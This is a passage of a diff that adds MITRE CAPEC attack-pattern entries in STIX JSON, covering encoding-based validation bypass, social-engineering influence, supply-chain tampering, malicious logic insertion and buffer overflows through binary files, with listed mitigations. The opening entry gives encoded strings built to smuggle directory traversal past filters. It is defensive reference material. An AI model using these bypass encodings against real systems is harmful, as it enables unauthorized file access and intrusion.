    Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: \"\\\\\\.\". With two parsing layers, this may get converted to \"\\.\" after the first parsing layer, and then, to \".\" after the second. If the input validation layer is between the two parsing layers, then \"\\\\\\.\\\\\\.\" might pass a test for \"..\" but still get converted to \"..\" afterwards. This may enable directory traversal attacks.
    Combine multiple encodings and observe the effects. For example, the attacker might encode \".\" as \"\\.\", and then, encode \"\\.\" as \"\.\", and then, encode that using URL encoding to \"%26%2392%3B%26%2346%3B\"

Exploit

  1. Leverage ability to bypass input validation: Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.

  2. Techniques
    Gain access to sensitive files.
    Perform command injection.
    Perform SQL injection.
    Perform XSS attacks.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "User input is used to construct a command to be executed on the target system or as part of the file name.", + "Multiple parser passes are performed on the data supplied by the user." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.", + "id": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1cce6424-2120-47d0-979c-8ee21cfa1e1a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--809958b7-bafc-4845-87c4-cab53e86cb67", + "spec_version": "2.1", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to perform input 
validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.", + "id": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2e5ce6d-7c06-4bf7-9b38-475351b97ad1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d94176ef-a1ff-499b-86b7-e94e8734ab6a", + "spec_version": "2.1", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. 
Input that does not match against the allowlist would not be permitted to enter into the system.", + "id": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-43-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--45fc127a-991a-47f3-a564-b96d95896f3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0f8d5a1-d4cc-4eac-b405-4af5e4a821c6", + "spec_version": "2.1", + "target_ref": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-430", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/430.html" + } + ], + "id": "attack-pattern--8428f01f-d4ca-4fb0-866d-8d5716b36265", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Micro-Expressions", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-431", + "source_name": 
"capec", + "url": "https://capec.mitre.org/data/definitions/431.html" + } + ], + "id": "attack-pattern--76afdae0-2970-44dc-8ae0-fd04629b0dab", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Neuro-Linguistic Programming (NLP)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. 
The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message.", + "external_references": [ + { + "external_id": "CAPEC-433", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/433.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Target Influence via The Human Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_extended_description": "\n The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. 
Structuring a human \"buffer overflow\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-434", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/434.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Interview and Interrogation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "", + "external_references": [ + { + "external_id": "CAPEC-435", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/435.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905", + 
"modified": "2014-06-23T00:00:00.000Z", + "name": "Target Influence via Instant Rapport", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. 
There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": 
"Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.", + "external_references": [ + { + "external_id": "CAPEC-439", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/439.html" + }, + { + "external_id": "CWE-1269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1269.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "SAFECode, The Software Supply Chain Integrity Framework Defining Risks and Responsibilities for Securing Software in the Global Supply Chain, 2009, Safecode.org", + "external_id": "REF-384", + "source_name": 
"reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Manipulation During Distribution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.", + "External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. 
This can allow the adversary access to the execution stack and execute arbitrary code in the target process.", + "external_references": [ + { + "external_id": "CAPEC-44", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/44.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Overflow Binary Resource File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the adversary has an excellent vector for wide distribution. 
There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target software: The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means.

Experiment

  1. Find injection vector: The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful.

  2. Craft overflow content: Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.

  3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software.

", + "x_capec_extended_description": "This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software processes binary resource files.", + "Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file." + ], + "x_capec_skills_required": { + "Medium": "To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform appropriate bounds checking on all buffers.", + "id": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--158ab2a0-3900-4c6d-a6b8-f70b277abce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbdf6185-93ce-4ed8-b163-4441304d2cec", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Static code analysis", + "id": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb1919fb-3b75-486e-9e5c-c0319ac4b906", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write 
to higher integrity processes", + "id": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "spec_version": "2.1", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Keep software patched to ensure that known vulnerabilities are not available for adversaries to target on host.", + "id": "course-of-action--6562497d-b76d-498e-9fd1-7c599daf2346", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec25c76a-d742-49a3-bd1e-bff659d7f1fe", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6562497d-b76d-498e-9fd1-7c599daf2346", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-440", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/440.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Hardware Additions", + "external_id": "T1200", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1200" + } + ], + "id": "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Integrity Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_prerequisites": [ + "Influence over the deployed system at a victim location." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently 
deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-442", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/442.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Marshall Brain, How Computer Viruses Work, 2007, MindPride", + "external_id": "REF-387", + "source_name": "reference_from_CAPEC", + "url": 